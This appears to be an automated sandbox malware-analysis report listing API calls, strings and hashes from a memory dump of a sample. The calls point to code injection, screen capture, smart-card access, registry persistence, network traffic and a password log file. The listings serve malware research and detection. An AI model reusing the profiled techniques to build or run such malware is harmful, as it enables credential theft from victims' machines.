                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Mw
                                                                                                                                                                                                              • API String ID: 1370207991-2204230210
                                                                                                                                                                                                              • Opcode ID: 12ceadf6ea3d707a4d4b92a9862973acfa4db90a7dbc93b517a5ae77a744aa89
                                                                                                                                                                                                              • Instruction ID: 9d1c0afc307371eaa309ec79c37a568ff3a7ca26e64399a97c3cb6bbf421272d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12ceadf6ea3d707a4d4b92a9862973acfa4db90a7dbc93b517a5ae77a744aa89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F0BE30952325B7E6317B9A9C0ABDEBA9C9F06B0AF004049FA05A61C08AA056008BE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA578
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA5A0
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA635
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA64A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000), ref: 012FA67A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA686
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,012FA693,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6BC
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6C6
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6CD
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: memset.MSVCRT(00000000,00000000,00000030,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6DE
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA72A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA697
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA69E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2609073853-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,01329E44,00000002,00000000), ref: 012F9A2A
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 012F9A4E
                                                                                                                                                                                                              • recv.WS2_32(?,00000001,?,00000000), ref: 012F9A7C
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 012F9AA0
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 012F9AC5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0132FCA8,00000001,?,?,?,00000000,?,?,00000001,00000000,?,00000001,?,00000000,?,?), ref: 012F9AED
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0132FBA0,?,?,?,?,00000000,?,?,00000001,00000000,?,00000001,?,00000000,?,?), ref: 012F9AFF
                                                                                                                                                                                                              • send.WS2_32(?,01329E48,00000002,00000000), ref: 012F9B0E
                                                                                                                                                                                                              • API ID: recv$lstrcmpsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1090895577-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001,?,00000101,?), ref: 012EDDBC
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012EDDBF
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EDDD1
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EDDE2
                                                                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000101), ref: 012EDDFC
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 012EDE56
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000101,0000001B,C01B0000), ref: 012EDE65
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EDE6A
                                                                                                                                                                                                              • API ID: Window$MessagePost$ClassLongNameVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4167699426-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(012ED21D,012ED21D,?,7707BCB0), ref: 012ECAAF
                                                                                                                                                                                                              • GetWindowInfo.USER32(012ED21D,?), ref: 012ECAC9
                                                                                                                                                                                                              • GetClassLongA.USER32(012ED21D,000000E6), ref: 012ECB1E
                                                                                                                                                                                                              • PrintWindow.USER32(012ED21D,?,00000000), ref: 012ECB37
                                                                                                                                                                                                              • BitBlt.GDI32(012ECD02,?,?,?,?,7707BCB0,00000000,00000000,00CC0020,012ED21D,?), ref: 012ECBDE
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                                • Part of subcall function 012EC8D0: SendMessageA.USER32(?,?,00000004,00000000,?,774D3050,?,012EC9F1,?,?), ref: 012EC8F8
                                                                                                                                                                                                                • Part of subcall function 012EC8D0: GdiFlush.GDI32(?,012EC9F1,?,?), ref: 012EC90E
                                                                                                                                                                                                                • Part of subcall function 012EC8D0: BitBlt.GDI32(012EC9F1,00000000,00000000,?,012EC9F1,?,00000000,00000000,00CC0020,?,012EC9F1,?,?), ref: 012EC934
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 2334662925-4251816714
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F0DC3
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F0DEF
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F0E16
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 012F0E5C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 012F0E6F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                              • String ID: Accept-Encoding:
                                                                                                                                                                                                              • API String ID: 853579731-3444961765
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012EBB8F
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012EBBBB
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012EBBE2
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 012EBC11
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012EBC27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                              • String ID: 9e2b3b2da
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000124,?,775B7390,?), ref: 01304C14
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,775B7390,?), ref: 01304C1F
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 01304C45
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,775B7390), ref: 01304C60
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 01304C6C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01304C88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01304C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 01311314
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 0131131F
                                                                                                                                                                                                              • htonl.WS2_32(000000FF), ref: 0131132A
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 01311336
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 01311350
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 01311363
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 0131136E
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 012F18AD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,9E2B3ECFa,00000000,00000001,?,00000104), ref: 012F18CF
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012F18DD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F18F0
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 9E2B3ECFa$software\microsoft
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 012F990B
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 012F9910
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F992F
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F9945
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 012F9959
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 012F995C
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 012F9960
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EB94B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 012EB980
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EB987
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 012EB99B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000005), ref: 012EB9AA
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastMessageMutexObjectReleaseSendSingleWaitWindow
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?), ref: 012E38C0
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,9e2b3eb7a,00000000,00000004,?,00000004), ref: 012E38DC
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 012E38EA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 012E38F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 9e2b3eb7a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-3208106814
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000,00000000,00000000,00140B17,?,01309447), ref: 01308AF4
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,01309447), ref: 01308B0E
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,01309447), ref: 01308B36
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,01309447), ref: 01308B42
                                                                                                                                                                                                                • Part of subcall function 012E7310: GetHandleInformation.KERNEL32(00000000,00000000,?,?,0130564E,?,00000000), ref: 012E7324
                                                                                                                                                                                                                • Part of subcall function 012E7310: CloseHandle.KERNEL32(00000000,?,?,0130564E,?,00000000), ref: 012E7335
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,01309447), ref: 01308B6E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00140B17,01309447,00000000,00140B17), ref: 01308BA0
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741995677-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.MSVCRT(?,00000004,?,00000000,012E2D01,?,?,012E2967,00000000,00000000,?,?,?,?,012E2D01,00000000), ref: 012E286F
                                                                                                                                                                                                              • exit.MSVCRT(00000001,?,012E2D01,00000000,00000000), ref: 012E287D
                                                                                                                                                                                                              • calloc.MSVCRT(012E2D01,00000004,?,012E2D01,00000000,00000000), ref: 012E2889
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E2896
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000000,?,?,?), ref: 012E28EA
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 012E290E
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,012F6A83,00000000), ref: 01305875
                                                                                                                                                                                                              • SCardListReadersA.WINSCARD(012F6A83,00000000,?,FFFFFFFF), ref: 0130588C
                                                                                                                                                                                                              • SCardConnectA.WINSCARD(012F6A83,?,00000002,00000003,?,?), ref: 013058BE
                                                                                                                                                                                                              • SCardDisconnect.WINSCARD(?,00000000), ref: 013058E9
                                                                                                                                                                                                              • SCardFreeMemory.WINSCARD(012F6A83,?), ref: 01305905
                                                                                                                                                                                                              • SCardReleaseContext.WINSCARD(012F6A83), ref: 01305913
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231658416-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF,00000001,00001000,00000000,?,?,?,?), ref: 013052EB
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0130531C
                                                                                                                                                                                                              • TranslateMessage.USER32(?,?,?,?,?), ref: 01305338
                                                                                                                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?), ref: 0130533E
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0130534C
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF,?,?,?,?), ref: 01305364
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1800058468-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(012ECD24,00000000,012ED21D,7707BCB0), ref: 012ECBFF
                                                                                                                                                                                                              • GetWindowLongA.USER32(012ECD24,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECD24), ref: 012ECC19
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(012ECD24,000000FA,?), ref: 012ECC34
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(012ECD24,000000FB,0000003C), ref: 012ECC61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4167475372-4251816714
                                                                                                                                                                                                              • Opcode ID: 88b511e9d8e5b5c90aa5608e7bacceca0498cbf19340e8626e73ec35136a714a
                                                                                                                                                                                                              • Instruction ID: 69fda9020e20ab54e64fd3c160cea3669d62903386d2b2d0e89bfbc3e412f628
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88b511e9d8e5b5c90aa5608e7bacceca0498cbf19340e8626e73ec35136a714a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3310770901B02AFC724CFAAD588A56FBF5BF48311B508A1DE59A93B54E730F4A0CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(00000050,00000000,00000000,?,01321094), ref: 013241AB
                                                                                                                                                                                                              • malloc.MSVCRT(00004000,?,?,?,000000FF,?), ref: 013241C1
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,000000FF,?), ref: 013241D3
                                                                                                                                                                                                              • malloc.MSVCRT(00000400,?,?,?,?,000000FF,?), ref: 013241EF
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 0132420E
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 0132421C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3061335427-0
                                                                                                                                                                                                              • Opcode ID: 616427dbedc31917207f5e58659dca0b234368ca3d22e969b372b2d9be00a536
                                                                                                                                                                                                              • Instruction ID: 7c0dc5660691951325551018f0c98f3e448e84308151da13f4b28314d77d6cbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 616427dbedc31917207f5e58659dca0b234368ca3d22e969b372b2d9be00a536
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC2130F2A017144BD730BF7EEC8168BBBE4AF44725B19883ED68AD6600D371E1558B91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB137
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FB175
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FB1B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                              • String ID: 61C5C0AD$pass.log
                                                                                                                                                                                                              • API String ID: 2713433229-898113997
                                                                                                                                                                                                              • Opcode ID: d1b8f24cb7d3db50884ab149fa6329d21852ef845d299b385ba7f29df4ce12c2
                                                                                                                                                                                                              • Instruction ID: f4885099ce238aef3588b7b4cbe9d58c7b241fc8bb3d2f82c42464fc6648d024
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1b8f24cb7d3db50884ab149fa6329d21852ef845d299b385ba7f29df4ce12c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F01108715042594BCB329E2CA9687E7BBE4EB86301F1446ADDEC987305EA708448CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E74A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,9e2b3e8fa,7765C3F0,?,?,012F2600,00000000,00000001), ref: 012E74C6
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E74E4
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E750D
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapAlloc.KERNEL32(00000000,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7514
                                                                                                                                                                                                                • Part of subcall function 012E74A0: memset.MSVCRT(00000000,00000000,00000001,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7527
                                                                                                                                                                                                                • Part of subcall function 012E74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E7553
                                                                                                                                                                                                                • Part of subcall function 012E74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7563
                                                                                                                                                                                                                • Part of subcall function 012E74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 012E7572
                                                                                                                                                                                                                • Part of subcall function 012E74A0: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7585
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7594
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapValidate.KERNEL32(00000000), ref: 012E759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,775B5CE0,012F3D3F), ref: 012E791C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E7923
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012E7933
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,775B5CE0,012F3D3F), ref: 012E7955
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E7958
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7965
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E7968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$AllocValidatememset$CreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 465464135-0
                                                                                                                                                                                                              • Opcode ID: fde2af6ab6f7fef33543950ff01bcb4a66580b5ef00d9aff746e49b86cb8ce39
                                                                                                                                                                                                              • Instruction ID: 2f89271df6a8abd87dd2408c0f7131a77e09bd51f0f52781b1ed3c3832e406f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fde2af6ab6f7fef33543950ff01bcb4a66580b5ef00d9aff746e49b86cb8ce39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D118671711216ABE730AEA99C48F9F7AACEF95B51F514128FA05E7284DA70DA0087E0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,01305097,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F41FE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4205
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,01305097,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4215
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,759834D0,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4229
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4230
